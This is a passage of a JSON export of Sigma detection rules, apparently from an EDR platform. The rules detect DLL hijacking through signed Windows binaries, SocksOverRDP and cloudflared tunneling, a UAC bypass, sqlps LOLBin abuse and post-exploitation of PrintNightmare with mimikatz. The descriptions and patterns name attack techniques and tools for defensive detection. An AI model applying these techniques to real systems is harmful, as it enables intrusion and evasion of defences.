"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "15f6d712-e496-4981-8fd1-3626e0c36d24",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097842Z",
"creation_date": "2026-03-23T11:45:34.097844Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097848Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_makecab.yml",
"content": "title: DLL Hijacking via makecab.exe\nid: 15f6d712-e496-4981-8fd1-3626e0c36d24\ndescription: |\n Detects potential Windows DLL Hijacking via makecab.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'makecab.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\Cabinet.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "15f6d712-e496-4981-8fd1-3626e0c36d24",
"rule_name": "DLL Hijacking via makecab.exe",
"rule_description": "Detects potential Windows DLL Hijacking via makecab.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "15fa5274-bd22-4eb6-862a-dfc8deceaaf8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082797Z",
"creation_date": "2026-03-23T11:45:34.082799Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082804Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/nccgroup/SocksOverRDP",
"https://attack.mitre.org/techniques/T1572"
],
"name": "t1572_socks_over_rdp_configuration_set.yml",
"content": "title: SocksOverRDP Registry Configuration Set\nid: 15fa5274-bd22-4eb6-862a-dfc8deceaaf8\ndescription: |\n Detects the SocksOverRDP registry configuration being set in registry.\n SocksOverRDP is an RDP tunneling tool that can be registered via \"regsvr32.exe\" with its DLL, that is usually placed in the \"%SystemRoot%\\system32\\\"\" or \"%SystemRoot%\\SysWoW64\\\" folder.\n When registered, the plugin listens on the port specified in the \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Terminal Server Client\\Default\\AddIns\\SocksOverRDP-Plugin\" registry key.\n Adversaries may use the RDP protocol to route traffic and communicate with their C2 as a way to bypass network protections.\n It is recommended to inspect the network traffic of the process, the registry paths mentioned above, the registry key, and any \"regsvr32.exe\" related alerts to determine if this plugin was installed maliciously.\nreferences:\n - https://github.com/nccgroup/SocksOverRDP\n - https://attack.mitre.org/techniques/T1572\ndate: 2025/09/24\nmodified: 2025/09/30\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1572\n - attack.lateral_movement\n - attack.t1021.001\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.Tunneling\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|contains: '\\AddIns\\SocksOverRDP-Plugin'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "15fa5274-bd22-4eb6-862a-dfc8deceaaf8",
"rule_name": "SocksOverRDP Registry Configuration Set",
"rule_description": "Detects the SocksOverRDP registry configuration being set in registry.\nSocksOverRDP is an RDP tunneling tool that can be registered via \"regsvr32.exe\" with its DLL, that is usually placed in the \"%SystemRoot%\\system32\\\"\" or \"%SystemRoot%\\SysWoW64\\\" folder.\nWhen registered, the plugin listens on the port specified in the \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Terminal Server Client\\Default\\AddIns\\SocksOverRDP-Plugin\" registry key.\nAdversaries may use the RDP protocol to route traffic and communicate with their C2 as a way to bypass network protections.\nIt is recommended to inspect the network traffic of the process, the registry paths mentioned above, the registry key, and any \"regsvr32.exe\" related alerts to determine if this plugin was installed maliciously.\n",
"rule_creation_date": "2025-09-24",
"rule_modified_date": "2025-09-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.001",
"attack.t1572"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "161d8bc5-7221-45bb-8d1d-89c6eae319c4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619209Z",
"creation_date": "2026-03-23T11:45:34.619211Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619215Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/cloudflare/cloudflared",
"https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/",
"https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/",
"https://www.intrinsec.com/akira_ransomware/",
"https://attack.mitre.org/techniques/T1102/"
],
"name": "t1102_cloudflare_tunnel.yml",
"content": "title: Suspicious Cloudflare Binary Execution\nid: 161d8bc5-7221-45bb-8d1d-89c6eae319c4\ndescription: |\n Detects the suspicious execution of a Cloudflare binary to establish a tunnel, a technique commonly used by threat actors to create stealthy, outbound-only connections for remote access and data exfiltration.\n This technique allows attackers to bypass firewalls and maintain persistent access to compromised systems without exposing public IP addresses.\n It is recommended to investigate the context in which this command was executed and to verify if the usage of this tool is legitimate in your infrastructure.\nreferences:\n - https://github.com/cloudflare/cloudflared\n - https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/\n - https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/\n - https://www.intrinsec.com/akira_ransomware/\n - https://attack.mitre.org/techniques/T1102/\ndate: 2025/05/15\nmodified: 2025/06/11\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1102\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n Image|endswith:\n - '\\cloudflared.exe'\n - '\\cloudflared-windows-386.exe'\n - '\\cloudflared-windows-amd64.exe'\n\n selection_imphash:\n Imphash:\n - '2548C430C08A1B7D76EDE5D863ADB956'\n - 'fc22e4f95641f6606222121e1a8a8508'\n\n selection_run:\n CommandLine|contains|all:\n - ' tunnel '\n - ' run'\n\n selection_token:\n CommandLine|contains:\n - ' --token '\n - ' --token-file '\n - ' --config '\n\n selection_service:\n CommandLine|contains|all:\n - ' service '\n - ' install'\n\n selection_url:\n CommandLine|contains|all:\n - ' tunnel '\n - ' --url '\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n condition: (selection_image or selection_imphash) and ((selection_run and selection_token) or selection_service or selection_url) and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "161d8bc5-7221-45bb-8d1d-89c6eae319c4",
"rule_name": "Suspicious Cloudflare Binary Execution",
"rule_description": "Detects the suspicious execution of a Cloudflare binary to establish a tunnel, a technique commonly used by threat actors to create stealthy, outbound-only connections for remote access and data exfiltration.\nThis technique allows attackers to bypass firewalls and maintain persistent access to compromised systems without exposing public IP addresses.\nIt is recommended to investigate the context in which this command was executed and to verify if the usage of this tool is legitimate in your infrastructure.\n",
"rule_creation_date": "2025-05-15",
"rule_modified_date": "2025-06-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1102"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1620a6e2-1bb5-4d3e-a9f4-f8a339518b1d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.587736Z",
"creation_date": "2026-03-23T11:45:34.587740Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.587748Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_winsat.yml",
"content": "title: DLL Hijacking via winsat.exe\nid: 1620a6e2-1bb5-4d3e-a9f4-f8a339518b1d\ndescription: |\n Detects potential Windows DLL Hijacking via winsat.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'winsat.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\d3d10_1core.dll'\n - '\\d3d10_1.dll'\n - '\\d3d10core.dll'\n - '\\d3d10.dll'\n - '\\d3d11.dll'\n - '\\dxgi.dll'\n - '\\version.dll'\n - '\\winmm.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1620a6e2-1bb5-4d3e-a9f4-f8a339518b1d",
"rule_name": "DLL Hijacking via winsat.exe",
"rule_description": "Detects potential Windows DLL Hijacking via winsat.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1659265d-21ea-4fb4-8440-e0a5ea0f2567",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092433Z",
"creation_date": "2026-03-23T11:45:34.092435Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092440Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/hfiref0x/UACME"
],
"name": "t1548_002_uac_bypass_inetmgr.yml",
"content": "title: UAC Bypass Executed via InetMgr\nid: 1659265d-21ea-4fb4-8440-e0a5ea0f2567\ndescription: |\n Detection of UAC bypass for `InetMgr.exe`.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to investigate the process that created the suspicious unsigned DLL mscoree.dll for suspicious activities.\nreferences:\n - https://github.com/hfiref0x/UACME\ndate: 2021/01/08\nmodified: 2025/01/15\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1574.001\n - attack.t1548.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image|endswith: '\\Windows\\System32\\inetsrv\\InetMgr.exe'\n ImageLoaded|endswith: '\\mscoree.dll'\n cond_ms_signed:\n Signed: 'true'\n Signature|contains:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n condition: selection and not cond_ms_signed\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1659265d-21ea-4fb4-8440-e0a5ea0f2567",
"rule_name": "UAC Bypass Executed via InetMgr",
"rule_description": "Detection of UAC bypass for `InetMgr.exe`.\nAdversaries may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to investigate the process that created the suspicious unsigned DLL mscoree.dll for suspicious activities.\n",
"rule_creation_date": "2021-01-08",
"rule_modified_date": "2025-01-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002",
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1677f32b-ab7c-4b86-a079-48c3166975e0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.595711Z",
"creation_date": "2026-03-23T11:45:34.595714Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.595722Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/",
"https://docs.microsoft.com/en-us/sql/tools/sqlps-utility",
"https://twitter.com/MsftSecIntel/status/1526680337216114693",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/techniques/T1127/"
],
"name": "t1059_001_suspicious_sqlps_execution.yml",
"content": "title: Suspicious sqlps.exe Execution\nid: 1677f32b-ab7c-4b86-a079-48c3166975e0\ndescription: |\n Detects the suspicious execution of the legitimate sqlps.exe Windows binary, a PowerShell wrapper for running SQL-built cmdlets which is a utility included with Microsoft SQL Server.\n Attackers can use this utility as a LOLBin to bypass security restrictions.\n It is recommended to investigate the legitimacy of the process responsible for the execution of sqlps.exe and to analyze child processes.\nreferences:\n - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/\n - https://docs.microsoft.com/en-us/sql/tools/sqlps-utility\n - https://twitter.com/MsftSecIntel/status/1526680337216114693\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1127/\ndate: 2022/06/07\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.defense_evasion\n - attack.t1127\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Sqlps\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n # Microsoft SQL Server 100 and 110 are PowerShell v2\n # Microsoft SQL Server 120 and 130 are PowerShell v4\n OriginalFileName: 'SQLPS.exe'\n exclusion_legitimate_parent:\n ParentCommandLine|contains:\n - '\\MSSQL\\Binn\\SQLAGENT.EXE -i '\n - '\\Tools\\Binn\\ManagementStudio\\Ssms.exe'\n - '\\Tools\\Binn\\SQLPS.exe agentjob'\n\n exclusion_interactive_shell:\n ProcessParentImage|endswith:\n - '\\cmd.exe'\n - '\\powershell.exe'\n - '\\pwsh.exe'\n ProcessGrandparentImage|endswith: '\\explorer.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1677f32b-ab7c-4b86-a079-48c3166975e0",
"rule_name": "Suspicious sqlps.exe Execution",
"rule_description": "Detects the suspicious execution of the legitimate sqlps.exe Windows binary, a PowerShell wrapper for running SQL-built cmdlets which is a utility included with Microsoft SQL Server.\nAttackers can use this utility as a LOLBin to bypass security restrictions.\nIt is recommended to investigate the legitimacy of the process responsible for the execution of sqlps.exe and to analyze child processes.\n",
"rule_creation_date": "2022-06-07",
"rule_modified_date": "2025-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1127"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1693e403-2800-4cd4-b918-144cf1d96336",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.609367Z",
"creation_date": "2026-03-23T11:45:34.609370Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.609377Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675",
"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1574_spoolsv_mimikatz_provider_load.yml",
"content": "title: Spoolsv Mimikatz Signed Print Provider Loaded\nid: 1693e403-2800-4cd4-b918-144cf1d96336\ndescription: |\n Detects spoolsv loading the mimikatz signed print provider.\n This is a sign of a CVE-2021-1675 post exploitation.\n It is recommended to isolate the affected assets and to look for attacker activities on other hosts.\nreferences:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675\n - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675\n - https://attack.mitre.org/techniques/T1055/\ndate: 2021/07/06\nmodified: 2025/04/08\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1055\n - attack.s0002\n - cve.2021-1675\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Exploit.CVE-2021-1675\n - classification.Windows.Exploit.PrintNightmare\n - classification.Windows.HackTool.Mimikatz\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image|endswith: '\\spoolsv.exe'\n Signed: 'true'\n Signature|contains: 'Open Source Developer, Benjamin Delpy'\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\\\?\\\\*'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1693e403-2800-4cd4-b918-144cf1d96336",
"rule_name": "Spoolsv Mimikatz Signed Print Provider Loaded",
"rule_description": "Detects spoolsv loading the mimikatz signed print provider.\nThis is a sign of a CVE-2021-1675 post exploitation.\nIt is recommended to isolate the affected assets and to look for attacker activities on other hosts.\n",
"rule_creation_date": "2021-07-06",
"rule_modified_date": "2025-04-08",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "16a70c78-b3ad-445a-bef6-ca597bfdb2b3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080546Z",
"creation_date": "2026-03-23T11:45:34.080548Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080552Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_sppsvc.yml",
"content": "title: DLL Hijacking via sppsvc.exe\nid: 16a70c78-b3ad-445a-bef6-ca597bfdb2b3\ndescription: |\n Detects potential Windows DLL Hijacking via sppsvc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'sppsvc.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTXML.dll'\n - '\\pkeyhelper.dll'\n - '\\webservices.dll'\n - '\\XmlLite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
